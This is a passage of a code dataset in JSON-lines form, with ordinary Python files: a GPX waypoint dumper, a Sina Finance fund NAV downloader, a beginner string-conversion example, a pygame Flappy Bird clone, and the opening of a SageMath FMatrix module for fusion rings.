\"__main__\":\n\n \"\"\"\n Dump all the waypoints out as a single gpx file to stdout\n \"\"\"\n\n class WaypointObserver(GpxObserver):\n\n def __init__(self):\n super(WaypointObserver, self).__init__()\n self.gpx = gpxWriter()\n\n def nextWayPoint(self, point):\n super(WaypointObserver, self).nextWayPoint(point)\n self.gpx.writeItem(point)\n\n def end(self):\n super(WaypointObserver, self).end()\n self.gpx.close()\n\n wdb = WaypointDB()\n\n o = WaypointObserver()\n app = GpxParser(o)\n\n from gps.lib.logWriter import LogWriter\n log = LogWriter()\n\n files = [x[0] for x in wdb.get()]\n\n # Print the waypoints\n app.Parse(files)\n\n\n\n\n\n\n\n\n\n\n","repo_name":"jhilling/gps","sub_path":"gps/lib/gpxWaypointDB.py","file_name":"gpxWaypointDB.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29656564968","text":"import requests\nimport pandas as pd\nimport os.path\nimport logging\n\nurl_of = 'http://stock.finance.sina.com.cn/fundInfo/api/openapi.php/CaihuiFundInfoService.getNav'\n\nclass OpenFundTSLoaderSinaMixin( object ):\n\n def writeLocalData( self, dataDf ):\n \"\"\"\n Write to local cache in CSV format\n \"\"\"\n dataDf.to_csv( os.path.join(self.localPrefix, '%s.csv' % self.fundCode ) )\n\n def getDataFromWeb( self, missingDates ):\n \"\"\"\n Download fund NAV data from Sina Finance via HTTP request\n \"\"\"\n\n if not missingDates:\n return pd.DataFrame()\n\n firstDate = str( min(missingDates).date() )\n lastDate = str( max(missingDates).date() )\n\n\n res = requests.post( url_of, data = { 'symbol' : self.fundCode, \n 'datefrom' : firstDate, \n 'dateto' : lastDate, \n } )\n if res.ok:\n logging.debug( \"%s:Start downloading fund data \", self.fundCode )\n dataJson = res.json().get( 'result' ).get( 'data' )\n totalLen = int( dataJson.get( 'total_num' ) )\n if totalLen == 0:\n logging.debug( \"No data found for %s, Skip.\", self.fundCode )\n return pd.DataFrame()\n data = dataJson.get( 'data' )\n currLen = len( data )\n\n pageNum = 2\n while currLen < totalLen:\n res = requests.post( url_of, data = { 'symbol' : self.fundCode, \n 'datefrom' : firstDate, \n 'dateto' : lastDate, \n 'page' : str( pageNum )\n } )\n dataJson = res.json().get( 'result' ).get( 'data' )\n data += dataJson.get( 'data' )\n\n currLen = len(data)\n pageNum += 1\n\n dataDf = pd.DataFrame.from_dict( data ).astype( { 'jjjz' : float, 'ljjz' : float } )\n dataDf[ 'fbrq' ] = pd.to_datetime( dataDf[ 'fbrq' ] )\n dataDf.rename( columns = { 'fbrq' : 'Date', 'jjjz' : 'NAV', 'ljjz' : 'ACC_NAV' }, inplace = True )\n dataDf[ 'Date' ] = dataDf[ 'Date' ].apply( pd.Timestamp )\n dataDf = dataDf[ dataDf[ 'Date' ].isin( missingDates ) ]\n dataDf.set_index( 'Date', inplace = True )\n logging.debug( \"%s:Downloaded %d records of fund NAVs.\", self.fundCode, len( dataDf ) )\n return dataDf\n else:\n return pd.DataFrame()\n","repo_name":"joshualee155/FundOptimizer","sub_path":"fundopt/openfundtsloadermixin.py","file_name":"openfundtsloadermixin.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"3496739928","text":"#!/usr/bin/env python3\n# O programa deseja feliz aniversário a alguém.\n\nage = 23\n\n# Essa linha gera um - TypeError: must be str, not int\n# message = \"Happy \" + age + \"rd Birthday!\"\n\n# Para representar valores que não são strings como strings:\nmessage = \"Happy \" + str(age) + \"rd Birthday!\"\n\nprint(message)\n","repo_name":"ranog/python_work","sub_path":"capitulo_02-Variaveis_e_tipos_de_dados_simples/birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29093327389","text":"import pygame\nfrom random import randint\n\n\nclass Cano(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n tamanho = randint(270, 480)\n\n self.image = pygame.image.load('data/pipe-green.png')\n self.image = pygame.transform.scale(self.image, (70, 300))\n self.rect = pygame.rect.Rect(570, tamanho, 70, 300)\n\n def update(self, *args):\n\n self.rect.x -= 5\n\n\nclass Cano_top(pygame.sprite.Sprite):\n def __init__(self, *groups, x=0):\n super().__init__(*groups)\n\n\n self.image = pygame.image.load('data/pipe-green.png')\n self.image = pygame.transform.scale(self.image, (70, 400))\n self.image = pygame.transform.flip(self.image, False, True)\n self.rect = pygame.rect.Rect(570, x, 70, 300)\n\n def update(self, *args):\n self.rect.x -= 5\n\n\nclass Bird(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/yellowbird.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(50, 315, 50, 50)\n\n def update(self, *args):\n key = pygame.key.get_pressed()\n\n if key == pygame.K_a:\n print('apertou 1')\n\n\nclass Conf(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/conf_bot.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(460, 590, 50, 50)\n\nclass Back(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/back.png')\n self.image = pygame.transform.scale(self.image, (35, 35))\n self.rect = pygame.rect.Rect(10, 590, 50, 50)\n\n\nclass Mouse(pygame.sprite.Sprite):\n def __init__(self, *groups):\n super().__init__(*groups)\n\n self.image = pygame.image.load('data/mouse.png')\n self.image = pygame.transform.scale(self.image, (15, 20))\n self.rect = pygame.rect.Rect(10, 590, 15, 20)\n\n def update(self, *args):\n\n self.rect = pygame.mouse.get_pos()\n#tela\npygame.init()\naltura = 630\nlargura = 500\ngameloop = True\nclock = pygame.time.Clock()\ntime = 0\ngameover = False\ngamestart = False\n\nscreen = pygame.display.set_mode((largura, altura))\n\nicon = pygame.image.load('data/yellowbird.png')\n\npygame.display.set_icon(icon)\npygame.display.set_caption('flappy bird')\n\n\n#fundo\nfundo = pygame.image.load('data/background-day.png')\nfundo = pygame.transform.scale(fundo, (largura, altura))\n\ngameover_png = pygame.image.load('data/gameover.png')\ngameover_png = pygame.transform.scale(gameover_png, (300, 100))\n\nstart_png = pygame.image.load('data/start.png')\nstart_png = pygame.transform.scale(start_png, (300, 500))\n\n#chao\nchao1 = pygame.image.load('data/base.png')\nchao1 = pygame.transform.scale(chao1, (500, 100))\nchao1_x = -250\nchao1_y = altura - 100\n\nchao2 = pygame.image.load('data/base.png')\nchao2 = pygame.transform.scale(chao2, (500, 100))\nchao2_x = 250\nchao2_y = altura - 100\n\n\n#personagens\nbird_group = pygame.sprite.Group()\nbird = Bird(bird_group)\n\nmovement =0\ngravity = 0.25\n\n#cano\ncanoGroup = pygame.sprite.Group()\n\n#placar\nplacar_time = 0\nplacar = 0\n\n\nbase_font = pygame.font.Font(None, 70)\n\nbase_font_regame = pygame.font.Font(None, 40)\n\nbase_font_placar_gameover = pygame.font.Font(None, 200)\n\n\n#conf\nconfGroup = pygame.sprite.Group()\nconf = Conf(confGroup)\nconf_tela = False\n\nbackGroup = pygame.sprite.Group()\nback = Back(backGroup)\n\nfundo_conf = pygame.image.load('data/fundo_conf.png')\nfundo_conf = pygame.transform.scale(fundo_conf, (largura, altura))\n\nbase_font_conf = pygame.font.Font(None, 30)\n\n\n\n#mouse\nmouseGroup = pygame.sprite.Group()\nmouse = Mouse(mouseGroup)\n\npygame.mouse.set_visible(False)\n\n\n#musicas\n\ncoxa = 'music/Hino do Coritiba - MEGA FUNK 2019.mp3'\nribamar = 'music/HOJE TEM GOL DO RIBAMAR - MC NANDINHO by Pitter Correa ((Audio Oficial)).mp3'\nazeitona = 'music/dj azeitona.mp3'\npressao = 'music/PRESSÃO NENÉM (completo).mp3'\nvale = 'music/VALE NADA VALE TUDO.mp3'\n\n\nwhile gameloop:\n clock.tick(60)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameloop = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n movement = 0\n movement -= 7\n gameover = False\n gamestart = True\n\n if pygame.sprite.collide_mask(mouse, conf):\n conf_tela = True\n\n if pygame.sprite.collide_mask(mouse, back):\n conf_tela = False\n gamestart = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_1:\n pygame.mixer.music.load(coxa)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_2:\n pygame.mixer.music.load(pressao)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_3:\n pygame.mixer.music.load(vale)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_4:\n pygame.mixer.music.load(ribamar)\n pygame.mixer.music.play(-1)\n\n if event.key == pygame.K_5:\n pygame.mixer.music.load(azeitona)\n pygame.mixer.music.play(-1)\n\n\n\n\n\n screen.blit(fundo, (0, 0))\n\n if conf_tela:\n\n screen.blit(fundo_conf, (0, 0))\n\n backGroup.draw(screen)\n else:\n\n\n if not gamestart:\n screen.blit(start_png, (100,100))\n confGroup.draw(screen)\n mouseGroup.draw(screen)\n mouseGroup.update()\n\n if gamestart:\n\n if not gameover:\n\n\n #draw\n canoGroup.draw(screen)\n canoGroup.update()\n\n screen.blit(chao1, (chao1_x, chao1_y))\n screen.blit(chao2, (chao2_x, chao2_y))\n\n bird_group.draw(screen)\n bird_group.update()\n\n\n movement += gravity\n bird.rect.y += movement\n\n\n #move chao\n\n chao1_x += -2\n chao2_x += -2\n\n if chao1_x <= -500:\n chao1_x = 494\n if chao2_x <= -500:\n chao2_x = 494\n\n\n #cano\n\n time +=1\n if time == 65:\n novo_cano = Cano(canoGroup)\n tamanho = 500 - novo_cano.rect.top\n novo_cano_top = Cano_top(canoGroup, x=-520 + novo_cano.rect.top)\n time = 0\n\n\n\n #placar\n for cano in canoGroup.spritedict:\n if cano.rect.x == 50:\n placar += 0.5\n\n placar_txt = str(placar).replace('.0', '')\n text_surface = base_font.render(placar_txt, True, (255, 255, 255))\n screen.blit(text_surface, (200, 0))\n\n placar_final = placar\n\n\n\n #colisao\n\n if pygame.sprite.spritecollide(bird, canoGroup, False, pygame.sprite.collide_mask):\n print('bateu')\n gameover = True\n\n if bird.rect.bottom >= altura - 70:\n gameover = True\n\n if bird.rect.top <= 0:\n gameover = True\n\n if gameover:\n screen.blit(gameover_png, (largura//2 - 150, altura//2 - 50))\n regame_txt = 'tap to play again'\n text_regame_surface = base_font_regame.render(regame_txt, True, (0, 0, 0))\n screen.blit(text_regame_surface, (130, 390))\n\n placar_final_txt = str(placar_final).replace('.0', '')\n text_surface = base_font_placar_gameover.render(placar_final_txt, True, (255, 255, 255))\n screen.blit(text_surface, (220, 100))\n\n\n bird.rect.center = (50, 315)\n canoGroup.empty()\n\n placar_time = 0\n placar = 0\n\n backGroup.draw(screen)\n\n #fim game screen\n pygame.display.update()\n\n\n #mouse\n\n\n mouseGroup.draw(screen)\n mouseGroup.update()\n\n\n #fim start screen\n pygame.display.update()\n\n\n\n","repo_name":"theohillmann/flappy-bird","sub_path":"flappy bird/flappy_bird/flappy birdV2.0 - Copia.pyw","file_name":"flappy birdV2.0 - Copia.pyw","file_ext":"pyw","file_size_in_byte":8271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70150647160","text":"r\"\"\"\nThe F-Matrix of a Fusion Ring\n\"\"\"\n# ****************************************************************************\n# Copyright (C) 2019 Daniel Bump \n# Guillermo Aboumrad \n# Travis Scrimshaw \n# Galit Anikeeva \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# https://www.gnu.org/licenses/\n# ****************************************************************************\n\n\nfrom copy import deepcopy\nfrom ctypes import cast, py_object\nfrom itertools import product, zip_longest\nfrom multiprocessing import Pool, cpu_count, set_start_method, shared_memory\nimport numpy as np\nfrom os import getpid, remove\nimport pickle\n\nfrom sage.algebras.fusion_rings.fast_parallel_fmats_methods import (\n _backward_subs, _solve_for_linear_terms,\n executor\n)\nfrom sage.algebras.fusion_rings.poly_tup_engine import (\n apply_coeff_map, constant_coeff,\n compute_known_powers,\n get_variables_degrees, variables,\n poly_to_tup, _tup_to_poly, tup_to_univ_poly,\n _unflatten_coeffs,\n poly_tup_sortkey,\n resize\n)\nfrom sage.algebras.fusion_rings.shm_managers import KSHandler, FvarsHandler\nfrom sage.graphs.graph import Graph\nfrom sage.matrix.constructor import matrix\nfrom sage.misc.misc import get_main_globals\nfrom sage.rings.ideal import Ideal\nfrom sage.structure.sage_object import SageObject\nfrom sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing\nfrom sage.rings.polynomial.polydict import ETuple\nfrom sage.rings.qqbar import AA, QQbar, number_field_elements_from_algebraics\n\nclass FMatrix(SageObject):\n r\"\"\"\n An F-matrix for a :class:`FusionRing`.\n\n INPUT:\n\n - ``FR`` -- a :class:`FusionRing`\n - ``fusion_label`` -- (optional) a string used to label basis elements\n of the :class:`FusionRing` associated to ``self``\n (see :meth:`FusionRing.fusion_labels`)\n - ``var_prefix`` -- (optional) a string indicating the desired prefix\n for variables denoting F-symbols to be solved\n - ``inject_variables`` -- (default: ``False``) a boolean indicating\n whether to inject variables (:class:`FusionRing` basis element\n labels and F-symbols) into the global namespace\n\n The :class:`FusionRing` or Verlinde algebra is the\n Grothendieck ring of a modular tensor category [BaKi2001]_.\n Such categories arise in conformal field theory or in the\n representation theories of affine Lie algebras, or\n quantum groups at roots of unity. They have applications\n to low dimensional topology and knot theory, to conformal\n field theory and to topological quantum computing. The\n :class:`FusionRing` captures much information about a fusion\n category, but to complete the picture, the F-matrices or\n 6j-symbols are needed. For example these are required in\n order to construct braid group representations. This\n can be done using the :class:`FusionRing` method\n :meth:`FusionRing.get_braid_generators`, which uses\n the F-matrix.\n\n We only undertake to compute the F-matrix if the\n :class:`FusionRing` is *multiplicity free* meaning that\n the Fusion coefficients `N^{ij}_k` are bounded\n by 1. For Cartan Types `X_r` and level `k`,\n the multiplicity-free cases are given by the\n following table.\n\n +------------------------+----------+\n | Cartan Type | `k` |\n +========================+==========+\n | `A_1` | any |\n +------------------------+----------+\n | `A_r, r\\geq 2` | `\\leq 2` |\n +------------------------+----------+\n | `B_r, r\\geq 2` | `\\leq 2` |\n +------------------------+----------+\n | `C_2` | `\\leq 2` |\n +------------------------+----------+\n | `C_r, r\\geq 3` | `\\leq 1` |\n +------------------------+----------+\n | `D_r, r\\geq 4` | `\\leq 2` |\n +------------------------+----------+\n | `G_2, F_4, E_6, E_7` | `\\leq 2` |\n +------------------------+----------+\n | `E_8` | `\\leq 3` |\n +------------------------+----------+\n\n Beyond this limitation, computation of the F-matrix\n can involve very large systems of equations. A\n rule of thumb is that this code can compute the\n F-matrix for systems with `\\leq 14` simple objects\n (primary fields) on a machine with 16 GB of memory.\n (Larger examples can be quite time consuming.)\n\n The :class:`FusionRing` and its methods capture much\n of the structure of the underlying tensor category.\n But an important aspect that is not encoded in the\n fusion ring is the associator, which is a homomorphism\n `(A\\otimes B)\\otimes C\\to A\\otimes(B\\otimes C)` that\n requires an additional tool, the F-matrix or 6j-symbol.\n To specify this, we fix a simple object `D`\n and represent the transformation\n\n .. MATH::\n\n \\text{Hom}(D, (A\\otimes B)\\otimes C)\n \\to \\text{Hom}(D, A\\otimes(B\\otimes C))\n\n by a matrix `F^{ABC}_D`. This depends on a pair of\n additional simple objects `X` and `Y`. Indeed, we can\n get a basis for `\\text{Hom}(D, (A\\otimes B)\\otimes C)`\n indexed by simple objects `X` in which the corresponding\n homomorphism factors through `X\\otimes C`, and similarly\n `\\text{Hom}(D, A\\otimes(B\\otimes C))` has a basis indexed\n by `Y`, in which the basis vector factors through `A\\otimes Y`.\n\n See [TTWL2009]_ for an introduction to this topic,\n [EGNO2015]_ Section 4.9 for a precise mathematical\n definition, and [Bond2007]_ Section 2.5 for a discussion\n of how to compute the F-matrix. In addition to\n [Bond2007]_, worked out F-matrices may be found in\n [RoStWa2009]_ and [CHW2015]_.\n\n The F-matrix is only determined up to a *gauge*. This\n is a family of embeddings `C \\to A\\otimes B` for\n simple objects `A, B, C` such that `\\text{Hom}(C, A\\otimes B)`\n is nonzero. Changing the gauge changes the F-matrix though\n not in a very essential way. By varying the gauge it is\n possible to make the F-matrices unitary, or it is possible\n to make them cyclotomic.\n\n Due to the large number of equations we may fail to find a\n Groebner basis if there are too many variables.\n\n EXAMPLES::\n\n sage: I = FusionRing(\"E8\", 2, conjugate=True)\n sage: I.fusion_labels([\"i0\", \"p\", \"s\"], inject_variables=True)\n sage: f = I.get_fmatrix(inject_variables=True); f\n creating variables fx1..fx14\n Defining fx0, fx1, fx2, fx3, fx4, fx5, fx6, fx7, fx8, fx9, fx10, fx11, fx12, fx13\n F-Matrix factory for The Fusion Ring of Type E8 and level 2 with Integer Ring coefficients\n\n We have injected two sets of variables to the global namespace.\n We created three variables ``i0, p, s`` to represent the\n primary fields (simple elements) of the :class:`FusionRing`. Creating\n the :class:`FMatrix` factory also created variables\n ``fx1, fx2, ..., fx14`` in order to solve the hexagon and pentagon\n equations describing the F-matrix. Since we called :class:`FMatrix`\n with the parameter ``inject_variables=True``, these have been injected\n into the global namespace. This is not necessary for the code to work\n but if you want to run the code experimentally you may want access\n to these variables.\n\n EXAMPLES::\n\n sage: f.fmatrix(s, s, s, s)\n [fx10 fx11]\n [fx12 fx13]\n\n The F-matrix has not been computed at this stage, so\n the F-matrix `F^{sss}_s` is filled with variables\n ``fx10``, ``fx11``, ``fx12``, ``fx13``. The task is\n to solve for these.\n\n As explained above The F-matrix `(F^{ABC}_D)_{X, Y}`\n two other variables `X` and `Y`. We have methods to\n tell us (depending on `A, B, C, D`) what the possibilities\n for these are. In this example with `A=B=C=D=s`\n both `X` and `Y` are allowed to be `i_0` or `s`.\n\n ::\n\n sage: f.f_from(s, s, s, s), f.f_to(s, s, s, s)\n ([i0, p], [i0, p])\n\n The last two statments show that the possible values of\n `X` and `Y` when `A = B = C = D = s` are `i_0` and `p`.\n\n The F-matrix is computed by solving the so-called\n pentagon and hexagon equations. The *pentagon equations*\n reflect the Mac Lane pentagon axiom in the definition\n of a monoidal category. The hexagon relations\n reflect the axioms of a *braided monoidal category*,\n which are constraints on both the F-matrix and on\n the R-matrix. Optionally, orthogonality constraints\n may be imposed to obtain an orthogonal F-matrix.\n\n ::\n\n sage: sorted(f.get_defining_equations(\"pentagons\"))[1:3]\n [fx9*fx12 - fx2*fx13, fx4*fx11 - fx2*fx13]\n sage: sorted(f.get_defining_equations(\"hexagons\"))[1:3]\n [fx6 - 1, fx2 + 1]\n sage: sorted(f.get_orthogonality_constraints())[1:3]\n [fx10*fx11 + fx12*fx13, fx10*fx11 + fx12*fx13]\n\n There are two methods available to compute an F-matrix.\n The first, :meth:`find_cyclotomic_solution` uses only\n the pentagon and hexagon relations. The second,\n :meth:`find_orthogonal_solution` uses additionally\n the orthogonality relations. There are some differences\n that should be kept in mind.\n\n :meth:`find_cyclotomic_solution` currently works only with\n smaller examples. For example the :class:`FusionRing` for `G_2`\n at level 2 is too large. When it is available, this method\n produces an F-matrix whose entries are in the same\n cyclotomic field as the underlying :class:`FusionRing`. ::\n\n sage: f.find_cyclotomic_solution()\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx1 - 1\n adding equation... fx11 - 1\n Done!\n\n We now have access to the values of the F-matrix using\n the methods :meth:`fmatrix` and :meth:`fmat`::\n\n sage: f.fmatrix(s, s, s, s)\n [(-1/2*zeta128^48 + 1/2*zeta128^16) 1]\n [ 1/2 (1/2*zeta128^48 - 1/2*zeta128^16)]\n sage: f.fmat(s, s, s, s, p, p)\n (1/2*zeta128^48 - 1/2*zeta128^16)\n\n :meth:`find_orthogonal_solution` is much more powerful\n and is capable of handling large cases, sometimes\n quickly but sometimes (in larger cases) after hours of\n computation. Its F-matrices are not always in the\n cyclotomic field that is the base ring of the underlying\n :class:`FusionRing`, but sometimes in an extension field adjoining\n some square roots. When this happens, the :class:`FusionRing` is\n modified, adding an attribute ``_basecoer`` that is\n a coercion from the cyclotomic field to the field\n containing the F-matrix. The field containing the F-matrix\n is available through :meth:`field`. ::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False, checkpoint=True) # not tested (~100 s)\n sage: all(v in CyclotomicField(56) for v in f.get_fvars().values()) # not tested\n True\n\n sage: f = FusionRing(\"G2\", 2).get_fmatrix()\n sage: f.find_orthogonal_solution(verbose=False) # long time (~11 s)\n sage: f.field() # long time\n Algebraic Field\n \"\"\"\n def __init__(self, fusion_ring, fusion_label=\"f\", var_prefix='fx', inject_variables=False):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"B3\", 2).get_fmatrix()\n sage: TestSuite(f).run(skip=\"_test_pickling\")\n \"\"\"\n self._FR = fusion_ring\n if inject_variables and (self._FR._fusion_labels is None):\n self._FR.fusion_labels(fusion_label, inject_variables=True)\n if not self._FR.is_multiplicity_free():\n raise NotImplementedError(\"FMatrix is only available for multiplicity free FusionRings\")\n # Set up F-symbols entry by entry\n n_vars = self.findcases()\n self._poly_ring = PolynomialRing(self._FR.field(), n_vars, var_prefix)\n if inject_variables:\n print(\"creating variables %s%s..%s%s\"%(var_prefix, 1, var_prefix, n_vars))\n self._poly_ring.inject_variables(get_main_globals())\n self._idx_to_sextuple, self._fvars = self.findcases(output=True)\n\n # Base field attributes\n self._field = self._FR.field()\n r = self._field.defining_polynomial().roots(ring=QQbar, multiplicities=False)[0]\n self._qqbar_embedding = self._field.hom([r], QQbar)\n\n # Warm starting\n self._chkpt_status = -1\n\n # Multiprocessing attributes\n self.mp_thresh = 10000\n self.pool = None\n\n #######################\n ### Class utilities ###\n #######################\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n EXAMPLES::\n\n sage: FusionRing(\"B2\", 1).get_fmatrix()\n F-Matrix factory for The Fusion Ring of Type B2 and level 1 with Integer Ring coefficients\n \"\"\"\n return \"F-Matrix factory for %s\"%self._FR\n\n def clear_equations(self):\n r\"\"\"\n Clear the list of equations to be solved.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"E6\", 1).get_fmatrix()\n sage: f.get_defining_equations('hexagons', output=False)\n sage: len(f.ideal_basis)\n 6\n sage: f.clear_equations()\n sage: len(f.ideal_basis) == 0\n True\n \"\"\"\n self.ideal_basis = []\n\n def clear_vars(self):\n r\"\"\"\n Reset the F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"C4\", 1).get_fmatrix()\n sage: fvars = f.get_fvars()\n sage: some_key = sorted(fvars)[0]\n sage: fvars[some_key]\n fx0\n sage: fvars[some_key] = 1\n sage: f.get_fvars()[some_key]\n 1\n sage: f.clear_vars()\n sage: f.get_fvars()[some_key]\n fx0\n \"\"\"\n self._fvars = {t: self._poly_ring.gen(idx) for idx, t in self._idx_to_sextuple.items()}\n self._solved = [False] * self._poly_ring.ngens()\n\n def _reset_solver_state(self):\n r\"\"\"\n Reset solver state and clear relevant cache.\n\n Used to ensure state variables are the same for each\n orthogonal solver run.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f._reset_solver_state()\n sage: K = f.field()\n sage: len(f._nnz.nonzero_positions())\n 1\n sage: f.find_orthogonal_solution(verbose=False)\n sage: K == f.field()\n False\n sage: f._reset_solver_state()\n sage: K == f.field()\n True\n sage: f.FR()._basecoer is None\n True\n sage: f._poly_ring.base_ring() == K\n True\n sage: sum(f._solved) == 0\n True\n sage: len(f.ideal_basis) == 0\n True\n sage: for k, v in f._ks.items():\n ....: k\n sage: len(f._nnz.nonzero_positions()) == 1\n True\n sage: all(len(x.q_dimension.cache) == 0 for x in f.FR().basis())\n True\n sage: len(f.FR().r_matrix.cache) == 0\n True\n sage: len(f.FR().s_ij.cache) == 0\n True\n \"\"\"\n self._FR._basecoer = None\n self._field = self._FR.field()\n self._non_cyc_roots = []\n self._poly_ring = self._poly_ring.change_ring(self._field)\n self._chkpt_status = -1\n self.clear_vars()\n self.clear_equations()\n n = self._poly_ring.ngens()\n self._var_degs = [0] * n\n self._kp = {}\n self._ks = KSHandler(n, self._field)\n self._singles = self.get_fvars_by_size(1, indices=True)\n self._nnz = self._get_known_nonz()\n\n # Clear relevant caches\n [x.q_dimension.clear_cache() for x in self._FR.basis()]\n self._FR.r_matrix.clear_cache()\n self._FR.s_ij.clear_cache()\n\n def fmat(self, a, b, c, d, x, y, data=True):\n r\"\"\"\n Return the F-Matrix coefficient `(F^{a, b, c}_d)_{x, y}`.\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"G2\", 1, fusion_labels=(\"i0\", \"t\"), inject_variables=True)\n sage: f = fr.get_fmatrix()\n sage: [f.fmat(t, t, t, t, x, y) for x in fr.basis() for y in fr.basis()]\n [fx1, fx2, fx3, fx4]\n sage: f.find_cyclotomic_solution(output=True)\n Setting up hexagons and pentagons...\n Finding a Groebner basis...\n Solving...\n Fixing the gauge...\n adding equation... fx2 - 1\n Done!\n {(t, t, t, i0, t, t): 1,\n (t, t, t, t, i0, i0): (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (t, t, t, t, i0, t): 1,\n (t, t, t, t, t, i0): (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (t, t, t, t, t, t): (zeta60^14 - zeta60^6 - zeta60^4 + 1)}\n sage: [f.fmat(t, t, t, t, x, y) for x in f._FR.basis() for y in f._FR.basis()]\n [(-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n 1,\n (-zeta60^14 + zeta60^6 + zeta60^4 - 1),\n (zeta60^14 - zeta60^6 - zeta60^4 + 1)]\n \"\"\"\n if (self._FR.Nk_ij(a, b, x) == 0 or self._FR.Nk_ij(x, c, d) == 0\n or self._FR.Nk_ij(b, c, y) == 0 or self._FR.Nk_ij(a, y, d) == 0):\n return 0\n\n # Some known zero F-symbols\n if a == self._FR.one():\n if x == b and y == d:\n return 1\n else:\n return 0\n if b == self._FR.one():\n if x == a and y == c:\n return 1\n else:\n return 0\n if c == self._FR.one():\n if x == d and y == b:\n return 1\n else:\n return 0\n if data:\n # Better to use try/except for speed. Somewhat trivial, but worth\n # hours when method is called ~10^11 times\n try:\n return self._fvars[a, b, c, d, x, y]\n except KeyError:\n return 0\n else:\n return (a, b, c, d, x, y)\n\n def fmatrix(self, a, b, c, d):\n r\"\"\"\n Return the F-Matrix `F^{a, b, c}_d`.\n\n INPUT:\n\n - ``a, b, c, d`` -- basis elements of the associated :class:`FusionRing`\n\n EXAMPLES::\n\n sage: fr = FusionRing(\"A1\", 2, fusion_labels=\"c\", inject_variables=True)\n sage: f = fr.get_fmatrix(new=True)\n sage: f.fmatrix(c1, c1, c1, c1)\n [fx0 fx1]\n [fx2 fx3]\n sage: f.find_cyclotomic_solution(verbose=False);\n adding equation... fx4 - 1\n adding equation... fx10 - 1\n sage: f.f_from(c1, c1, c1, c1)\n [c0, c2]\n sage: f.f_to(c1, c1, c1, c1)\n [c0, c2]\n sage: f.fmatrix(c1, c1, c1, c1)\n [ (1/2*zeta32^12 - 1/2*zeta32^4) (-1/2*zeta32^12 + 1/2*zeta32^4)]\n [ (1/2*zeta32^12 - 1/2*zeta32^4) (1/2*zeta32^12 - 1/2*zeta32^4)]\n \"\"\"\n X = self.f_from(a, b, c, d)\n Y = self.f_to(a, b, c, d)\n return matrix([[self.fmat(a, b, c, d, x, y) for y in Y] for x in X])\n\n def field(self):\n r\"\"\"\n Return the base field containing the F-symbols.\n\n When ``self`` is initialized, the field is set to be the\n cyclotomic field of the :class:`FusionRing` associated\n to ``self``.\n\n The field may change after running :meth:`find_orthogonal_solution`.\n At that point, this method could return the\n associated :class:`FusionRing`'s cyclotomic field, an\n appropriate :func:`NumberField` that was computed on the fly\n by the F-matrix solver, or the :class:`QQbar`.\n\n Depending on the ``CartanType`` of ``self``, the solver may need\n to compute an extension field containing certain square roots that\n do not belong to the associated :class:`FusionRing`'s cyclotomic field.\n\n In certain cases we revert to :class:`QQbar` because\n the extension field computation does not seem to terminate. See\n :meth:`attempt_number_field_computation` for more details.\n\n The method :meth:`get_non_cyclotomic_roots` returns a list of\n roots defining the extension of the :class:`FusionRing`'s\n cyclotomic field needed to contain all F-symbols.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1).get_fmatrix()\n sage: f.field()\n Cyclotomic Field of order 60 and degree 16\n sage: f.find_orthogonal_solution(verbose=False)\n sage: f.field()\n Number Field in a with defining polynomial y^32 - ... - 22*y^2 + 1\n sage: phi = f.get_qqbar_embedding()\n sage: [phi(r).n() for r in f.get_non_cyclotomic_roots()]\n [-0.786151377757423 - 8.92806368517581e-31*I]\n\n .. NOTE::\n\n Consider using ``self.field().optimized_representation()`` to\n obtain an equivalent :func:`NumberField` with a defining\n polynomial with smaller coefficients, for a more efficient\n element representation.\n \"\"\"\n return self._field\n\n def FR(self):\n r\"\"\"\n Return the :class:`FusionRing` associated to ``self``.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"D3\", 1).get_fmatrix()\n sage: f.FR()\n The Fusion Ring of Type D3 and level 1 with Integer Ring coefficients\n \"\"\"\n return self._FR\n\n def findcases(self, output=False):\n r\"\"\"\n Return unknown F-matrix entries.\n\n If run with ``output=True``,\n this returns two dictionaries; otherwise it just returns the\n number of unknown values.\n\n EXAMPLES::\n\n sage: f = FusionRing(\"G2\", 1, fusion_labels=(\"i0\", \"t\")).get_fmatrix()\n sage: f.findcases()\n 